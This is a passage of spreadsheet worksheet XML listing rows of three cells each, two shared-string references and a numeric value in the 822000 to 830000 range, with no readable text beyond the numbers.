      <c r="A21489" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21489" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21489" s="15">
        <v>822667</v>
      </c>
    </row>
    <row r="21490" spans="1:3">
      <c r="A21490" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21490" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21490" s="15">
        <v>822845</v>
      </c>
    </row>
    <row r="21491" spans="1:3">
      <c r="A21491" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21491" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21491" s="15">
        <v>823000</v>
      </c>
    </row>
    <row r="21492" spans="1:3">
      <c r="A21492" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21492" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21492" s="15">
        <v>823290</v>
      </c>
    </row>
    <row r="21493" spans="1:3">
      <c r="A21493" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21493" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21493" s="15">
        <v>823460</v>
      </c>
    </row>
    <row r="21494" spans="1:3">
      <c r="A21494" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21494" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21494" s="15">
        <v>823480</v>
      </c>
    </row>
    <row r="21495" spans="1:3">
      <c r="A21495" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21495" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21495" s="15">
        <v>823490</v>
      </c>
    </row>
    <row r="21496" spans="1:3">
      <c r="A21496" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21496" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21496" s="15">
        <v>823545</v>
      </c>
    </row>
    <row r="21497" spans="1:3">
      <c r="A21497" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21497" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21497" s="15">
        <v>823550</v>
      </c>
    </row>
    <row r="21498" spans="1:3">
      <c r="A21498" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21498" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21498" s="15">
        <v>823555</v>
      </c>
    </row>
    <row r="21499" spans="1:3">
      <c r="A21499" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21499" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21499" s="15">
        <v>823560</v>
      </c>
    </row>
    <row r="21500" spans="1:3">
      <c r="A21500" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21500" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21500" s="15">
        <v>823570</v>
      </c>
    </row>
    <row r="21501" spans="1:3">
      <c r="A21501" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21501" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21501" s="15">
        <v>823580</v>
      </c>
    </row>
    <row r="21502" spans="1:3">
      <c r="A21502" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21502" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21502" s="15">
        <v>823590</v>
      </c>
    </row>
    <row r="21503" spans="1:3">
      <c r="A21503" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21503" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21503" s="15">
        <v>823626</v>
      </c>
    </row>
    <row r="21504" spans="1:3">
      <c r="A21504" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21504" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21504" s="15">
        <v>823645</v>
      </c>
    </row>
    <row r="21505" spans="1:3">
      <c r="A21505" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21505" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21505" s="15">
        <v>823660</v>
      </c>
    </row>
    <row r="21506" spans="1:3">
      <c r="A21506" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21506" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21506" s="15">
        <v>823667</v>
      </c>
    </row>
    <row r="21507" spans="1:3">
      <c r="A21507" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21507" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21507" s="15">
        <v>823670</v>
      </c>
    </row>
    <row r="21508" spans="1:3">
      <c r="A21508" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21508" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21508" s="15">
        <v>823674</v>
      </c>
    </row>
    <row r="21509" spans="1:3">
      <c r="A21509" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21509" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21509" s="15">
        <v>823755</v>
      </c>
    </row>
    <row r="21510" spans="1:3">
      <c r="A21510" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21510" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21510" s="15">
        <v>823767</v>
      </c>
    </row>
    <row r="21511" spans="1:3">
      <c r="A21511" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21511" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21511" s="15">
        <v>823845</v>
      </c>
    </row>
    <row r="21512" spans="1:3">
      <c r="A21512" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21512" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21512" s="15">
        <v>823855</v>
      </c>
    </row>
    <row r="21513" spans="1:3">
      <c r="A21513" s="28" t="s">
        <v>26960</v>
      </c>
      <c r="B21513" s="14" t="s">
        <v>17455</v>
      </c>
      <c r="C21513" s="15">
        <v>823867</v>
      </c>
    </row>
    <row r="21514" spans="1:3">
      <c r="A21514" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21514" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21514" s="15">
        <v>824000</v>
      </c>
    </row>
    <row r="21515" spans="1:3">
      <c r="A21515" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21515" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21515" s="15">
        <v>824290</v>
      </c>
    </row>
    <row r="21516" spans="1:3">
      <c r="A21516" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21516" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21516" s="15">
        <v>824460</v>
      </c>
    </row>
    <row r="21517" spans="1:3">
      <c r="A21517" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21517" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21517" s="15">
        <v>824480</v>
      </c>
    </row>
    <row r="21518" spans="1:3">
      <c r="A21518" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21518" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21518" s="15">
        <v>824490</v>
      </c>
    </row>
    <row r="21519" spans="1:3">
      <c r="A21519" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21519" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21519" s="15">
        <v>824550</v>
      </c>
    </row>
    <row r="21520" spans="1:3">
      <c r="A21520" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21520" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21520" s="15">
        <v>824560</v>
      </c>
    </row>
    <row r="21521" spans="1:3">
      <c r="A21521" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21521" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21521" s="15">
        <v>824570</v>
      </c>
    </row>
    <row r="21522" spans="1:3">
      <c r="A21522" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21522" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21522" s="15">
        <v>824580</v>
      </c>
    </row>
    <row r="21523" spans="1:3">
      <c r="A21523" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21523" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21523" s="15">
        <v>824590</v>
      </c>
    </row>
    <row r="21524" spans="1:3">
      <c r="A21524" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21524" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21524" s="15">
        <v>824626</v>
      </c>
    </row>
    <row r="21525" spans="1:3">
      <c r="A21525" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21525" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21525" s="15">
        <v>824645</v>
      </c>
    </row>
    <row r="21526" spans="1:3">
      <c r="A21526" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21526" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21526" s="15">
        <v>824660</v>
      </c>
    </row>
    <row r="21527" spans="1:3">
      <c r="A21527" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21527" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21527" s="15">
        <v>824667</v>
      </c>
    </row>
    <row r="21528" spans="1:3">
      <c r="A21528" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21528" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21528" s="15">
        <v>824670</v>
      </c>
    </row>
    <row r="21529" spans="1:3">
      <c r="A21529" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21529" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21529" s="15">
        <v>824674</v>
      </c>
    </row>
    <row r="21530" spans="1:3">
      <c r="A21530" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21530" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21530" s="15">
        <v>824755</v>
      </c>
    </row>
    <row r="21531" spans="1:3">
      <c r="A21531" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21531" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21531" s="15">
        <v>824845</v>
      </c>
    </row>
    <row r="21532" spans="1:3">
      <c r="A21532" s="28" t="s">
        <v>26961</v>
      </c>
      <c r="B21532" s="14" t="s">
        <v>15468</v>
      </c>
      <c r="C21532" s="15">
        <v>824867</v>
      </c>
    </row>
    <row r="21533" spans="1:3">
      <c r="A21533" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21533" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21533" s="15">
        <v>826000</v>
      </c>
    </row>
    <row r="21534" spans="1:3">
      <c r="A21534" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21534" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21534" s="15">
        <v>826290</v>
      </c>
    </row>
    <row r="21535" spans="1:3">
      <c r="A21535" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21535" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21535" s="15">
        <v>826460</v>
      </c>
    </row>
    <row r="21536" spans="1:3">
      <c r="A21536" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21536" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21536" s="15">
        <v>826480</v>
      </c>
    </row>
    <row r="21537" spans="1:3">
      <c r="A21537" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21537" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21537" s="15">
        <v>826490</v>
      </c>
    </row>
    <row r="21538" spans="1:3">
      <c r="A21538" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21538" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21538" s="15">
        <v>826545</v>
      </c>
    </row>
    <row r="21539" spans="1:3">
      <c r="A21539" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21539" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21539" s="15">
        <v>826550</v>
      </c>
    </row>
    <row r="21540" spans="1:3">
      <c r="A21540" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21540" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21540" s="15">
        <v>826555</v>
      </c>
    </row>
    <row r="21541" spans="1:3">
      <c r="A21541" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21541" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21541" s="15">
        <v>826560</v>
      </c>
    </row>
    <row r="21542" spans="1:3">
      <c r="A21542" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21542" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21542" s="15">
        <v>826570</v>
      </c>
    </row>
    <row r="21543" spans="1:3">
      <c r="A21543" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21543" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21543" s="15">
        <v>826580</v>
      </c>
    </row>
    <row r="21544" spans="1:3">
      <c r="A21544" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21544" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21544" s="15">
        <v>826590</v>
      </c>
    </row>
    <row r="21545" spans="1:3">
      <c r="A21545" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21545" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21545" s="15">
        <v>826626</v>
      </c>
    </row>
    <row r="21546" spans="1:3">
      <c r="A21546" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21546" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21546" s="15">
        <v>826645</v>
      </c>
    </row>
    <row r="21547" spans="1:3">
      <c r="A21547" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21547" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21547" s="15">
        <v>826660</v>
      </c>
    </row>
    <row r="21548" spans="1:3">
      <c r="A21548" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21548" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21548" s="15">
        <v>826667</v>
      </c>
    </row>
    <row r="21549" spans="1:3">
      <c r="A21549" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21549" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21549" s="15">
        <v>826670</v>
      </c>
    </row>
    <row r="21550" spans="1:3">
      <c r="A21550" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21550" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21550" s="15">
        <v>826674</v>
      </c>
    </row>
    <row r="21551" spans="1:3">
      <c r="A21551" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21551" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21551" s="15">
        <v>826755</v>
      </c>
    </row>
    <row r="21552" spans="1:3">
      <c r="A21552" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21552" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21552" s="15">
        <v>826767</v>
      </c>
    </row>
    <row r="21553" spans="1:3">
      <c r="A21553" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21553" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21553" s="15">
        <v>826845</v>
      </c>
    </row>
    <row r="21554" spans="1:3">
      <c r="A21554" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21554" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21554" s="15">
        <v>826855</v>
      </c>
    </row>
    <row r="21555" spans="1:3">
      <c r="A21555" s="28" t="s">
        <v>26962</v>
      </c>
      <c r="B21555" s="14" t="s">
        <v>17456</v>
      </c>
      <c r="C21555" s="15">
        <v>826867</v>
      </c>
    </row>
    <row r="21556" spans="1:3">
      <c r="A21556" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21556" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21556" s="15">
        <v>827290</v>
      </c>
    </row>
    <row r="21557" spans="1:3">
      <c r="A21557" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21557" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21557" s="15">
        <v>827460</v>
      </c>
    </row>
    <row r="21558" spans="1:3">
      <c r="A21558" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21558" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21558" s="15">
        <v>827480</v>
      </c>
    </row>
    <row r="21559" spans="1:3">
      <c r="A21559" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21559" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21559" s="15">
        <v>827490</v>
      </c>
    </row>
    <row r="21560" spans="1:3">
      <c r="A21560" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21560" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21560" s="15">
        <v>827545</v>
      </c>
    </row>
    <row r="21561" spans="1:3">
      <c r="A21561" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21561" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21561" s="15">
        <v>827550</v>
      </c>
    </row>
    <row r="21562" spans="1:3">
      <c r="A21562" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21562" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21562" s="15">
        <v>827560</v>
      </c>
    </row>
    <row r="21563" spans="1:3">
      <c r="A21563" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21563" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21563" s="15">
        <v>827570</v>
      </c>
    </row>
    <row r="21564" spans="1:3">
      <c r="A21564" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21564" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21564" s="15">
        <v>827580</v>
      </c>
    </row>
    <row r="21565" spans="1:3">
      <c r="A21565" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21565" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21565" s="15">
        <v>827590</v>
      </c>
    </row>
    <row r="21566" spans="1:3">
      <c r="A21566" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21566" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21566" s="15">
        <v>827626</v>
      </c>
    </row>
    <row r="21567" spans="1:3">
      <c r="A21567" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21567" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21567" s="15">
        <v>827645</v>
      </c>
    </row>
    <row r="21568" spans="1:3">
      <c r="A21568" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21568" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21568" s="15">
        <v>827660</v>
      </c>
    </row>
    <row r="21569" spans="1:3">
      <c r="A21569" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21569" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21569" s="15">
        <v>827667</v>
      </c>
    </row>
    <row r="21570" spans="1:3">
      <c r="A21570" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21570" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21570" s="15">
        <v>827670</v>
      </c>
    </row>
    <row r="21571" spans="1:3">
      <c r="A21571" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21571" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21571" s="15">
        <v>827674</v>
      </c>
    </row>
    <row r="21572" spans="1:3">
      <c r="A21572" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21572" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21572" s="15">
        <v>827755</v>
      </c>
    </row>
    <row r="21573" spans="1:3">
      <c r="A21573" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21573" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21573" s="15">
        <v>827845</v>
      </c>
    </row>
    <row r="21574" spans="1:3">
      <c r="A21574" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21574" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21574" s="15">
        <v>827855</v>
      </c>
    </row>
    <row r="21575" spans="1:3">
      <c r="A21575" s="28" t="s">
        <v>26963</v>
      </c>
      <c r="B21575" s="14" t="s">
        <v>17457</v>
      </c>
      <c r="C21575" s="15">
        <v>827867</v>
      </c>
    </row>
    <row r="21576" spans="1:3">
      <c r="A21576" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21576" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21576" s="15">
        <v>828290</v>
      </c>
    </row>
    <row r="21577" spans="1:3">
      <c r="A21577" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21577" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21577" s="15">
        <v>828480</v>
      </c>
    </row>
    <row r="21578" spans="1:3">
      <c r="A21578" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21578" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21578" s="15">
        <v>828490</v>
      </c>
    </row>
    <row r="21579" spans="1:3">
      <c r="A21579" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21579" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21579" s="15">
        <v>828580</v>
      </c>
    </row>
    <row r="21580" spans="1:3">
      <c r="A21580" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21580" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21580" s="15">
        <v>828590</v>
      </c>
    </row>
    <row r="21581" spans="1:3">
      <c r="A21581" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21581" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21581" s="15">
        <v>828645</v>
      </c>
    </row>
    <row r="21582" spans="1:3">
      <c r="A21582" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21582" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21582" s="15">
        <v>828667</v>
      </c>
    </row>
    <row r="21583" spans="1:3">
      <c r="A21583" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21583" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21583" s="15">
        <v>828755</v>
      </c>
    </row>
    <row r="21584" spans="1:3">
      <c r="A21584" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21584" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21584" s="15">
        <v>828767</v>
      </c>
    </row>
    <row r="21585" spans="1:3">
      <c r="A21585" s="28" t="s">
        <v>26964</v>
      </c>
      <c r="B21585" s="14" t="s">
        <v>17458</v>
      </c>
      <c r="C21585" s="15">
        <v>828855</v>
      </c>
    </row>
    <row r="21586" spans="1:3">
      <c r="A21586" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21586" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21586" s="15">
        <v>829290</v>
      </c>
    </row>
    <row r="21587" spans="1:3">
      <c r="A21587" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21587" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21587" s="15">
        <v>829460</v>
      </c>
    </row>
    <row r="21588" spans="1:3">
      <c r="A21588" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21588" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21588" s="15">
        <v>829480</v>
      </c>
    </row>
    <row r="21589" spans="1:3">
      <c r="A21589" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21589" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21589" s="15">
        <v>829490</v>
      </c>
    </row>
    <row r="21590" spans="1:3">
      <c r="A21590" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21590" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21590" s="15">
        <v>829545</v>
      </c>
    </row>
    <row r="21591" spans="1:3">
      <c r="A21591" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21591" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21591" s="15">
        <v>829550</v>
      </c>
    </row>
    <row r="21592" spans="1:3">
      <c r="A21592" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21592" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21592" s="15">
        <v>829555</v>
      </c>
    </row>
    <row r="21593" spans="1:3">
      <c r="A21593" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21593" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21593" s="15">
        <v>829560</v>
      </c>
    </row>
    <row r="21594" spans="1:3">
      <c r="A21594" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21594" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21594" s="15">
        <v>829570</v>
      </c>
    </row>
    <row r="21595" spans="1:3">
      <c r="A21595" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21595" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21595" s="15">
        <v>829580</v>
      </c>
    </row>
    <row r="21596" spans="1:3">
      <c r="A21596" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21596" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21596" s="15">
        <v>829590</v>
      </c>
    </row>
    <row r="21597" spans="1:3">
      <c r="A21597" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21597" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21597" s="15">
        <v>829626</v>
      </c>
    </row>
    <row r="21598" spans="1:3">
      <c r="A21598" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21598" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21598" s="15">
        <v>829645</v>
      </c>
    </row>
    <row r="21599" spans="1:3">
      <c r="A21599" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21599" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21599" s="15">
        <v>829660</v>
      </c>
    </row>
    <row r="21600" spans="1:3">
      <c r="A21600" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21600" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21600" s="15">
        <v>829667</v>
      </c>
    </row>
    <row r="21601" spans="1:3">
      <c r="A21601" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21601" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21601" s="15">
        <v>829670</v>
      </c>
    </row>
    <row r="21602" spans="1:3">
      <c r="A21602" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21602" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21602" s="15">
        <v>829674</v>
      </c>
    </row>
    <row r="21603" spans="1:3">
      <c r="A21603" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21603" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21603" s="15">
        <v>829755</v>
      </c>
    </row>
    <row r="21604" spans="1:3">
      <c r="A21604" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21604" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21604" s="15">
        <v>829767</v>
      </c>
    </row>
    <row r="21605" spans="1:3">
      <c r="A21605" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21605" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21605" s="15">
        <v>829845</v>
      </c>
    </row>
    <row r="21606" spans="1:3">
      <c r="A21606" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21606" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21606" s="15">
        <v>829855</v>
      </c>
    </row>
    <row r="21607" spans="1:3">
      <c r="A21607" s="28" t="s">
        <v>26965</v>
      </c>
      <c r="B21607" s="14" t="s">
        <v>17459</v>
      </c>
      <c r="C21607" s="15">
        <v>829867</v>
      </c>
    </row>
    <row r="21608" spans="1:3">
      <c r="A21608" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21608" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21608" s="15">
        <v>830000</v>
      </c>
    </row>
    <row r="21609" spans="1:3">
      <c r="A21609" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21609" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21609" s="15">
        <v>830290</v>
      </c>
    </row>
    <row r="21610" spans="1:3">
      <c r="A21610" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21610" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21610" s="15">
        <v>830460</v>
      </c>
    </row>
    <row r="21611" spans="1:3">
      <c r="A21611" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21611" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21611" s="15">
        <v>830480</v>
      </c>
    </row>
    <row r="21612" spans="1:3">
      <c r="A21612" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21612" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21612" s="15">
        <v>830490</v>
      </c>
    </row>
    <row r="21613" spans="1:3">
      <c r="A21613" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21613" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21613" s="15">
        <v>830545</v>
      </c>
    </row>
    <row r="21614" spans="1:3">
      <c r="A21614" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21614" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21614" s="15">
        <v>830550</v>
      </c>
    </row>
    <row r="21615" spans="1:3">
      <c r="A21615" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21615" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21615" s="15">
        <v>830555</v>
      </c>
    </row>
    <row r="21616" spans="1:3">
      <c r="A21616" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21616" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21616" s="15">
        <v>830560</v>
      </c>
    </row>
    <row r="21617" spans="1:3">
      <c r="A21617" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21617" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21617" s="15">
        <v>830570</v>
      </c>
    </row>
    <row r="21618" spans="1:3">
      <c r="A21618" s="28" t="s">
        <v>26966</v>
      </c>
